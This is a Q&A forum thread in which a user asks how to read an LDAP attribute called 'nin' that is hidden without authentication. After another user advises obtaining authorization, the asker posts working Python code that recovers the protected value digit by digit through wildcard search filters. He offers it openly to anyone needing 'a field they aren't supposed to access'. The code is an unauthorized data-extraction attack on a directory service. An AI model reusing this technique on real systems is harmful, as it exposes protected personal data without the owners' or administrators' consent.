tags:

views:

25

answers:

2
Q: 

Binary search of unaccesible data field in ldap from python

I'm interested in reproducing a particular python script.

I have a friend who was accessing an ldap database, without authentication. There was a particular field of interest, we'll call it nin (an integer) for reference, and this field wasn't accessible without proper authentication. However, my friend managed to access this field through some sort of binary search (rather than just looping through integers) on the data; he would check the first digit, check if it was greater or less than the starting value, he would augment that until it returned a true value indicating existence, adding digits and continuing checking until he found the exact value of the integer nin.

Any ideas on how he went about this? I've access to a similarly set up database.

A: 

Your best bet would be to get authorization to access that field. You are circumventing the security of the database otherwise.

Patrick  2010-06-03 17:18:40
That's the easy way. However, the field was accessible without proper authorization and I'm trying to reproduce that and understand what's going on there, and I don't have access to the script that he wrote which could do this.
EricR  2010-06-03 17:30:46
A: 

Figured it out. I just needed to filter on (&(cn=My name)(nin=guess*) and I managed to filter until it returns the correct result.

Code follows in case anyone else needs to find a field they aren't supposed to access, but can check results for and know the name of.

def lookup(self, username="", guess=0,verbose=0):
        guin = guess
        result_set = []
        varsearch = "(&(name=" + str(username) + ")(" + "nin" + "=" + str(guin) + "*))"
        result_id = self.l.search("", ldap.SCOPE_SUBTREE, varsearch, ["nin"])
        while True:
            try:
                result_type, result_data = self.l.result(result_id, 0, 5.0)
                if (result_data == []):
                    break
                else:
                    if result_type == ldap.RES_SEARCH_ENTRY:
                        result_set.append(result_data)
            except ldap.TIMEOUT:
                return {"name": username}
        if len(result_set) == 0:
            return self.lookup(username, guin + 1,verbose)
        else:
            if guess < 1000000:
                return self.lookup(username, guess * 10,verbose)
            else:
                if verbose==1:
                    print "Bingo!",
                return str(guess)
EricR  2010-06-04 18:53:00
It isn't a binary search, but the time it takes to resolve the field is low enough that it doesn't matter. These are queries submitted by users, not scripts, so when it takes as long to load a webpage with a form, as it does to search the data, then there's no point in attempting and optimisation.
EricR  2010-06-24 21:31:41

related questions

Programmatically talking to a Serial Port in OS X or Linux
Best ways to teach a beginner to program?
Calling a Function From a String With the Function's Name in Python
An executable Python app
Text Editor For Linux (Besides Vi)?
What Hosting Service is best for Django applications?
File size differences after copying a file to a server vía FTP
Python: what is the difference between (1,2,3) and [1,2,3], and when should I use each?
Python: What OS am I running on?
How do I make a menu in python that does not require the user to press (enter) to make a selection?
How do you express binary literals in Python?
What is the most efficient graph data structure in Python?
Adding a Method to an Existing Object
How to learn Python: Good Example Code?
How do I use Python's itertools.groupby()?
Python and MySQL
Class views in Django
Is there an IDE that provides code completion for Python
Using 'in' to match an attribute of Python objects in an array
cx_Oracle - what is the best way to iterate over a result set?
cx_Oracle - How do I access Oracle from Python?
Continuous Integration System for a Python Codebase
Get a preview jpeg of a pdf on windows?
How can I find the full path to a font from its display name on a Mac?
XML Processing in Python